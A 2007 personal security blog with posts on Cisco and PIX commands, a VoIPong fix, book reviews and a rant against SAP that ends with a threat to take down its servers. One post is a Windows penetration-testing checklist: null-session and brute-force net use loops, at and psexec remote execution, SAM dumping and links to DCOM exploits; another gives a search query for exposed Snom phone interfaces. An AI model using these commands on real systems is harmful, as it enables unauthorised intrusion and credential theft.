Friday, June 29, 2007

Youtube's 40+ security vulnerabilities

The other night i was chatting with Chris1an about web security and i just happen to realised that he was actually the one who killed Youtube. Some of you might have already knew that he was the one who discovered around 40+ vulnerabilities in Youtube and became famous overnight. Anyway Christ1an is based in Germany and he is only a student, but hack, he is a guru in web security. He was being interviewed by the register and google actually thanked him for his work.

Recently Christ1an launched http://planet-websecurity.org/ with the intention to bring together similarly themed news and rants related to Web security and to display them in one place. Visit his blog on the right side of my feed or check it out here.

The Hacka Man

Thursday, June 28, 2007

SAP

I always wanted to work for SAP because they pay huge money. I remembered i was being interviewed by SAP back in Singapore. During the first interview, it took me at least 1-2 hours of conversation and i passed the interview. The HR invited me for a second interview, however this time, the interviewer is crap. He asked all sorts of questions and i succintly answered them without beating around the bush. Its either he didnt get what i am trying to say or he is just plain talkative. I entrench strong to my roots for what i said and he did not believe me and saying that i am a pefect candidate for the position and looks like what they are searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonize me and i loathe them for that. I am a straight person, if you don't wish to hire me, thats fine, just tell me straight and i will understand. Don't have to setup a bunch of stories and be a coward.

Well, good luck to you SAP. If i have a chance to audit your system, i promise i will bring down all your SAP/R3 servers and other external servers you have. Better protect your RFC or you will be OWNED!

The Hacka Man

Wednesday, June 27, 2007

Cisco show mem vs show processes memory sorted

For me to check the router or firewall cpu usage and the memory usage, i always issue the show mem or show processes cpu to see what is causing the router to have a high CPU or memomry utilization. However, i realised that the show mem command output is not as nice as it seemed to be. I was looking at ioshints blog and found out the same command with a little tweaks here and there. This command provides a better output than show mem which is very important for troubleshooting purposes. See below:

show processes memory sorted

show processes cpu sorted 1min

show processes cpu sorted 7min

From cisco:

http://www.cisco.com/warp/public/63/showproc_cpu.html

http://www.cisco.com/warp/public/63/highcpu.html

For Cisco and Juniper command:

http://networking.ringofsaturn.com/Cisco/ciscojuniper.php

Tuesday, June 26, 2007

Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter

I was invited by Lucian to review this book. Lucian actually sent me a copy of this book for me to read and i was happy upon receiving it. Well, i am someone who loves firewall and security stuff especially linux and cisco. This book is absolutely amazing. For beginners, there are a lot of technical configuration you can read and learn and for experts, this book will guide you to some topic that might interest you. I would really want to put this book into practice, but however base on my current situation, i will only have the time to read and understand the concept. I would highly rate this book a 4.5/5 and anyone who wants to learn firewall at a low level.

VoIPong installation error

For those of you who try to install VoIPong and have installation errors like the ones below, the problem and solution are provided as shown below:

Murat Balaban writes:

>
> Hi Henrique,
>
> Which UNIX user is trying to run voipong? It seems a non-root
> user is running it, but does not have the sufficient privileges
> to open the ethernet device in promisc mode.
>
> Plus, you seem to have problems with the permissions of
> your modules directory. That directory should be owned by
> the same user running voipong.
>
> Thursday, May 31, 2007, 8:41:56 PM, you wrote:
>
> > Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1
> > SMP Ter Abr 6 09:28:24 BRT 2004 i686]
>
> > (c) Murat Balaban http://www.enderunix.org/
> > 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP
> > Sniffer starting...
> > 31/05/07 14:34:14: Release 2.0 running on DINP70759
> > [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004
> > i686]. (c) Murat Balaban http://www.enderunix.org/
> > [pid: 669]
> > 31/05/07 14:34:14: Default matching algorithm: lfp
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: loaded 0 module(s)
> > 31/05/07 14:34:14: libpcap start failure:
> > pcap_open_live: SIOCGIFHWADDR: No such device
>
> > 31/05/07 14:34:14: PID 669 [parent: 653]: exited with
> > code: 1. uptime: .
>
I had the same problems and i had solved it using this command
sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*
Also for the voipongnets, i created the file by
touch /usr/local/etc/voipong/voipongnets
This will solve the error below.

Monday, June 25, 2007

Snom phones web interface exposed to public.

I was just researching on hard and soft phones and i came across Snom VoIP phones. I don't know much about the phones, however a simple google dorking gave me a bad result. Default installations of the phone is not password protected. Check it out:

"(e.g. 0114930398330)" snom


Sunday, June 24, 2007

Hakin9 X Hackathology

This past week, i was invited by hakin9 magazine to write an article about the lastest hacking skills. I am still thinking about a topic to write. There are different types of hacks and i am in a dilemma in choosing one. After pondering for sometime, i think i would love to write hacks about VoIP. Personally, because VoIP is a subset of network security, i think its best to write something that i am good at. I had already setup a PBX server and now its up to the guys at hakin9. The hakin9 team is a bunch of really cool and nice guys. They gave me a free copy of their magazine and once my article is published, they will also send me a copy of the published issue. I will keep you guys updated on this. Let me know what you guys think?

Friday, June 22, 2007

David Litchfield new Oracle book

I had been wanting to learn more about Oracle hacking and i would not say i am not really good in Oracle Security. I managed to setup a Oracle Database server and do some simple exploitation and auditing, however i know that for me to be good in that aspect, it would require to focus most of my time trying to exploit and learn the techniques to hacking the database. This past week, it had came to my attention that David Litchfield(Oracle Security Guru, google him up to find out more) had published a book called Oracle Hacker's Handbook. I highly recommend anyone who loves Oracle Security to purchase this book. Although i had not lay my hands on this book, it will soon be on my bookshelves.

Monday, June 18, 2007

Using ftp with CUTCP telnet

Check out CUTCP

"Telnet is a program used to interactively log in to a remote computer. CUTCP telnet is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it:

1) First use telnet to log in to the remote host.

2) Press Alt/T. This will generate an ftp command with the proper network address and start the ftp client program on the interactive host.

3) When it asks for a name, enter anything.

4) When it asks for a password, press Alt/W. This will provide a hidden password to authenticate the connection.

Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the put command. To transfer a file from the PC to the interactive host, use the get command."

Sunday, June 17, 2007

Regular Expressions with Cisco IOS

I was reaading some cisco stuffs today and i knew long ago that Cisco IOS allows regular expression for simplification of search task and other uses. Well, back then i did not research much on it but i just came across 2 sites which provides more explaination with regards to Cisco IOS regex.

http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm

http://www.nil.com/ipcorner/EnhanceIOSUI/

Saturday, June 16, 2007

Cisco Router's DNS server to kill browser advertisement

I just happen to stumble across ioshints blog. He mentioned something about the cisco router's dns server having a way to prevent unwanted website advertisement. You guys can read more at: http://www.nil.com/ipcorner/RouterDNS/

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)



Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.


Nmap server to look for port 135

Run rpcscan or epdump on server over port tcp or udp port 135

If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.

Run walksam query if SMAR interface is present to glean user information.

Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present

Compromise admin password using brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell
Use SPKIE msrpcfuzz fuzzer to do stress test.


-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping NetBIOS table: Nbtstat –A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
CARAA <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
CARAA <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique hostname
<00> group domain name
<03> unique Messenger service running for that computer
<03> unique Messenger service running for that individual logged in user
<20> unique Server service running
<1D> group Master browser name for the subnet
<1B> unique Domain master browser name, identifies PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ “” /user:””
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.


Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.

1. Create a file credentials.txt with username and password:

Password Username
“” Administrator
Password Administrator
Admin Administrator

2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS tool with LOOP
FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i > out.txt


Connect through valid user:
Smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and accessing registry keys using
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2



CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
Smbserverscan to scan for smb related ports.
Smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

Smbdumpusers to enumerate port 139 and 445.
Smbdumpusers –i 192.168.1.152 –m 2 –P1

Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.
Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1

Need to have admin user name and password.
Samrdump to list all username in server
Rpcdump to list all endpoint bindings

Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Restrictanonymous =0, 1, 2

Use pwdump5 to capture SAM file.
Use netcat to open a shell on remote OS
Use psexec through port 139 or 445 to execute command
Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe


IIS buffer overflow

IIS 5.0 SSL Remote root exploit use thciisslame

Wednesday, June 13, 2007

Cisco's PIX/ASA TCP flags syntax

Have you guys ever wondered how PIX or ASA firewall TCP 3 way handshake works? Well, its absolutely similiar to how the normal TCP/IP handshake works. Just a little different in terms of the syntax. For instance SYN flag in PIX is known as saA. For torubleshooting purposes, you would however need to know these flags in PIX/ASA. I had summarised a table of the flags and how it works.

Tuesday, June 12, 2007

PIX firewall troubleshooting commands

I am adding some commonly used PIX firewall troubleshooting commands. For those of you who does troubleshooting of the firewall, you know should familiar yourself with these commmands. Handy yet Powerful.

1. show xlate, show xlate detail - display NAT translations and its details

2. show connection, show connection detail - display connection details built in the firewall

3. show service-policy - display inspection policies

4. show local-host 192.168.1.1 - display translation, AAA, connection information

5. show asp drop - show number of packets dropped while processing the packets

6. show mem - display memory usage in the PIX

7. show cpu usage - display cpu usage over a time period

8. show traffic - display total traffic transmitted and received on each individual interfaces on the PIX

9. show block and show cpu usage can determine if the firewall is overloaded.

Of course there are many other things you would need to know like the debug commands, capture commands, show logging, show running logging, show logging setting commands. If you guys need to know more, just email me and i will guide you